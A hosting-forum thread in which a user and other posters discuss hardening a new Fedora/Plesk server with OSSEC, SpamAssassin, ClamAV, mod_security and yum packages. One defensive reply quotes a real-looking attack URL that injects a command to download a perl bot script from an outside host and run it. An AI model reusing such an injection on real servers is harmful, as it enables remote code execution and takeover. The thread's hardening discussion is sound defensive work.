
Overview of securing a new server??


bendalf

Guest
Hi,

I've been running a dedicated server for the last year but will finally upgrade to a more powerful server later this month.
This will allow me to start from scratch and therefore I would like to know a few things before I start with it.

I've already made a small list of actions I need to take to achieve what I want but I'm wondering if such an "overview" already exists. (There are separate posts about this but as far as I know there is no complete guide available.) Step-by-step instructions are always welcome of course.

This is what I want to achieve/do starting from a Fedora 4 install with Plesk 8.0

1. Backups
Implement a good backup solution using rsnapshot/rsync. Backups will be done to a remote rsync server.
Normally I will take a snapshot every 4 hours of the entire system.
2. Secure & harden the server
I'm planning to install Ossec for this. I also will not be using the plesk firewall.
3. Mail & Spam
Install Spamassassin and ClamAv
4. Monitoring
I've been using Cacti for over a year now so I will just install this again. I also tried Zabbix but this was overkill for me.
5. Logging & reporting
Since I hate grepping/finding/etc all the log-files, I installed Splunk. Simply the best tool for searching and reporting events from the logs.

Questions:

*Since I want to minimize the packages which are installed, which packages can I remove (DrWeb, psa-firewall) and how?
*For added security, which other packages should I install on top of Ossec? Which firewall should I install?
*For mail, should I install other things besides the ones I mentioned above?
*I've read some things about the packages of AtomicTurtle. I'm used to compiling everything myself so what is the added value of his repository (easy to use, etc) ?
*For the backup, which folders should I backup in order to restore a complete system from scratch?

Thanks.

ps. Using the info gathered here I will try to create 1 complete overview for other people.
pps. If this is not the correct forum, my apologies.
 
Originally posted by atomicturtle
A similar thread here in the ART forums:

http://atomicrocketturtle.com/forum/viewtopic.php?t=1640

OSSEC is a fantastic app, I've been making changes to it left and right to tune it for hosting environments in ASL.
Thanks, I've seen that thread but it's not exactly what I'm looking for :( ASL seems to be a great and nice tool but not for me. I like to work with separate packages in order to learn from it and to control it exactly like I want.

I'm more looking in what to remove from the initial installation, what new things to install and also important in which order.
 
The short version here, there's more than one way to do it.

ASL is a similar design to PSA, it's reconfiguring the packages underneath, like mod_security, ossec, the kernel, etc, based on your security model. Granted I'm bundling those rpms as well, but there's nothing to stop you from taking them apart to tinker (source code is available).

I don't spend a lot of time down in the weeds on the specific packages installed on the system as a security control. In years gone by that was the security model used when there weren't any better alternatives. SELinux, and GRSecurity being two of the bigger ones to change that security model with what is called Role Based Access Control (RBAC). With an RBAC system you could have gcc, perl modules, etc installed on the system, and block access to them even by the root user. In practice, it's like password protecting applications.

It helps a lot if you have a good solid understanding of the threat first. With hosting your threat is about 90% web based applications, and 10% everything else. This is compounded further because you're most likely not in control of those applications, or if you are, in a position to change them if they're vulnerable to exploitation. This is assuming you even know what is there in the first place. The model used by the attacker is to use those exploitable applications to upload their tools to further control the system. Methods used to block that have involved removing applications like wget, curl, etc, or mounting the tmp partitions noexec. The attackers respond by uploading their own versions of wget, running from apache writable directories, or an even more trivial model, using shell/perl/python/ruby/php scripts (this gets around noexec).

So your security model needs to address the following:
1) You cannot remediate your vulnerable applications (too many/unknown)
2) Removing tools is ineffective (attackers upload their own)
3) noexec settings do not stop these tools from being run (trivial to bypass)

Response:
1) Input validation, before traffic gets to those applications, with mod_security, and suhosin. When this fails

2) Use kernel level security controls to control the context in which applications can execute. I.e., Trusted Path Execution in GRsecurity is a great example of a simple security model. Untrusted users can only execute commands owned by root. This is further enhanced by user-id level firewall rules, untrusted users can only use these ports, or contact these addresses. When this fails

3) Host based IDS to track file integrity checks, and automatically respond to host based security events. If we get to this security control, we're basically at the point where we're using this in a forensic/recovery capacity. The system has already been compromised.

I'm hardly scratching the surface with item #2 there. The security controls in SELinux and Grsecurity are far more granular than I could articulate in brief. SELinux data-labeling being a prime example. If the app isn't labeled correctly, it won't run by anything (not php, sh, perl, etc) by any user, including root. You can't even move an application labeled at one security level down to a lower one, or even cut and paste between them. It's quite a powerful tool for securing hosting environments, closing off nearly every method an attacker could use to load exploit code to a system. I'm aiming for this to be the heart of the ASL 3.0 release.
 
Originally posted by bendalf

This is what I want to achieve/do starting of a Fedora 4 install with Plesk 8.0

Why are you starting with a distribution that doesn't receive any security updates? And why not the latest version of Plesk? FC5 will be EOL next week, so at least go with FC6. If you're not into upgrading your OS every year, you might want to take a look at CentOS/RHEL instead (very similar, though much longer lifecycle).

Since I want to minimize the packages which are installed, which packages can I remove (DrWeb, psa-firewall) and how?

You could just not install them when you're installing Plesk or remove them afterwards using yum (or rpm directly).
 
thanks for the replies.

I've done some more checking and finally decided to do the below actions. I do have a question about the atomic YUM repository.

I've seen that most tools I want are included in it but are there any differences between using that yum repo or installing from source ?
 
It depends on the package, in general they're all modified in some way or another. Changes can be things like pre or post installation/upgrade actions, triggers to perform actions when other packages are installed/updated/removed, build time optimizations, and modifications to the original source code.

Then there is all the dependency/conflict information. For example, if I know a particular configuration setting is only going to work with a specific version of a library (this is a HUUUUUGE problem), I build that check into the package.
 
Thanks atomicturtle, I decided to use your rpms and everything installed correctly yesterday.

The only rpm that I did not find was razor.

yum install dcc razor pyzor
Setting up Install Process
Setting up repositories
Reading repository metadata in from local files
Parsing package install arguments
No Match for argument: razor

Both dcc and pyzor installed without any problem.
 
For those who want to know, here is the complete list of actions I've done yesterday. Note that I started from a FC4 and Plesk 8 install.

1* Plesk
Remove unused Plesk modules through the plesk GUI
Update Plesk to latest version using the plesk GUI (only select those components which are installed)

2* Remove unused application vault packages and DrWeb
yum remove AdvancedPoll AutoIndex CSLH DocFAQ Owl PostNuke TUTOS Tellme UebiMiau WebCalendar WebShopmanager
WordPress b2evolution bbclone gallery gtchat openbiblio pLog phpAds phpBB phpBook phpBugTracker phpDig phpMoney
phpMyFamily phpWiki phpsurveyor typo wordpress

yum remove drweb-base drweb-daemon drweb-qmail drweb-updater
3* Configure YUM to use the Atomic repository
4* Perform system update. This mainly updated MySQL and PHP
yum update
5* Install Spamassassin
Edit the file /etc/yum.conf to remove the exclude option. In my installation this was defined as "exclude=spamassassin". Otherwise, yum will not find any spamassassin installations.

yum install spamassassin
6* Install DCC and Pyzor. To check: Razor was not found
yum install dcc razor pyzor
7* Install ClamAV anti-virus
yum install qmail-scanner clamav-db clamav clamd
When done, also run the qmail scanner config
qmail-scanner-reconfigure
8* Reboot the machine and check if all services are started. In my case, spamassassin was not configured to start at boot. This can be solved by using
chkconfig --level 345 spamassassin on
9* Install OSSEC Host Intrusion Detection. This will start an installation script which lets you define what ossec should handle
wget http://www.ossec.net/files/ossec-hids-1.2.tar.gz
tar -zxvf ossec-hids-*.tar.gz
cd ossec-hids-*
./install.sh

Voilà, I rebooted the server and everything still seems to work. I also tested Ossec and it generated some very nice alerts.
Still to do are configuring everything, installing cacti monitoring and splunk to check all my logs.
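Step 5 above hinges on removing the `exclude=spamassassin` entry from /etc/yum.conf without disturbing anything else excluded there. As an added example (not code from the thread), this POSIX shell function drops one package name from the `exclude=` line and leaves the other entries and the rest of the file intact; the sample yum.conf content is constructed here for illustration.

```shell
#!/bin/sh
# Added example, not from the thread: remove one package name from the
# "exclude=" line of a yum.conf-style file, keeping other excluded
# packages. Usage: strip_yum_exclude <conf-file> <package-name>
strip_yum_exclude() {
    conf="$1"
    pkg="$2"
    tmp="$conf.tmp.$$"
    # Only lines of the form "exclude=..." are rewritten; every other line
    # passes through unchanged, so repository sections are untouched.
    awk -v pkg="$pkg" '
        /^[[:space:]]*exclude[[:space:]]*=/ {
            split($0, kv, "=")
            n = split(kv[2], items, /[[:space:],]+/)
            out = ""
            for (i = 1; i <= n; i++) {
                if (items[i] != "" && items[i] != pkg)
                    out = out (out == "" ? "" : " ") items[i]
            }
            # Drop the line entirely when nothing remains excluded.
            if (out != "") print "exclude=" out
            next
        }
        { print }
    ' "$conf" > "$tmp" && mv "$tmp" "$conf"
}

# Constructed sample resembling the [main] section of a Plesk-era yum.conf.
make_sample_conf() {
    cat > "$1" <<'EOF'
[main]
cachedir=/var/cache/yum
exclude=spamassassin kernel*
gpgcheck=1
EOF
}
```

Run it against a copy of the real file first and diff the result before touching /etc/yum.conf itself.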
 
I'm still wondering why you went with FC4 when you say you want a secure server. FC4 has been EOL for a while now.

And the package is called razor-agents, not razor.
 
Originally posted by breun
I'm still wondering why you went with FC4 when you say you want a secure server. FC4 has been EOL for a while now.

And the package is called razor-agents, not razor.

thanks.. about FC4: it's not because this is EOL that you cannot secure it. The issue is that FC4 comes preloaded on that server. (is there an easy way to upgrade to a more recent version?) but I'm indeed thinking of going over to debian.
 
You might want to check out the Atomic Offline OS Installer, a script at Atomic Rocket Turtle that will do a clean install of CentOS 4 on a machine running another OS.

Although Debian is a fine distribution I have the feeling that rpm-based distros like CentOS(/Fedora/RHEL) have less problems running Plesk. Plus Atomic Rocket Turtle does support CentOS, but not Debian.
 
Plus debian is for heathens. :p Notes on razor taken, I'll update that package soon to also work with the name "razor".

Something to add to your list, I packaged up the OSSEC web interface in the atomic channel, it's called "ossec-wui".
 
Ok, I finally have more time now so I can get on with the server.
Ossec is working fine including the active response.

I do have some questions about Spamassassin and ClamAV though.
Until now, I just installed them and have not yet taken a look at the configuration. Are there any actions I have to take like updating rules and AV settings ? I've read something about that rulesdujour, should I use that (if so where can I find extra info)?

Also, still on my list are installing mod_security and securing the /tmp folder. Any info about that is very welcome.

thanks
 
In SA 3.0 they added an internal updater, sa-update. It has support for other channels of signatures, similar to the way yum works. Clamav also has an internal updater, called freshclam. In my packages I've got these set up to run through cron. Also check out adding dcc, razor, and pyzor to SA. You don't have to do anything special to the SA config, just install them and restart.

Setting /tmp noexec doesn't really do anything these days. The badguys just upload a perl script, and run perl /tmp/scriptname. Here's an example:
http://teste21.t35.com/cmd/tool25.d...freewebs.com/seucu/gvabot.txt;perl gvabot.txt

Right now mod_security has some pretty severe performance limitations, so you can't load all our rules from gotroot.com on versions above 1.9.x . What you'll need to do on the newer versions is try to customize the core rules for your environment, which isn't a terribly pretty task. That being said, the 2.x series lets you do some much more useful inspection on the traffic (down to the session level, which is awesome), as well as anomaly detection.
 
Thanks for the answer Atomicturtle :)

For dcc, razor and pyzor, I just installed them using your rpms and restarted SA. Am I correct that these plugins do not need updates of rules ?

In my logs I now see these lines:
Failed loading /usr/lib/php/modules/php_ioncube_loader_lin_5.0.so: /usr/lib/php/modules/php_ioncube_loader_lin_5.0.so: undefined symbol: empty_string

I guess this is because I updated to php 5.2 and mysql 5.0. I remember seeing something like below:

warning: /etc/php.ini created as /etc/php.ini.rpmnew
warning: /etc/my.cnf created as /etc/my.cnf.rpmnew

Can I just replace the current php.ini & my.cnf with the new ones or are there extra steps to take ?

thanks

PS: I'm not a member of the Ossec team but I can really recommend it to anyone who wants to secure their servers. For me, this really is a must-have tool as I'm still amazed at all the alerts and actions it takes :D

PPS: About that ioncube error: I uninstalled the sitebuilder modules from plesk. I think that because of this, also the ioncube tool was removed. Can someone confirm that (so basically I can just remove that module from php.ini)?
 
Did a further check yesterday and replaced the my.cnf and php.ini with the new ones (after checking the options of course).

for that ioncube thing, I just uninstalled it using yum (both ioncube loader and the sitebuilder package).

Everything is working excellent now.
 
Side note there, I did put together a new php-ioncube-loader rpm as well. It automatically will reconfigure itself to use the right extension with the version of php you're running.
 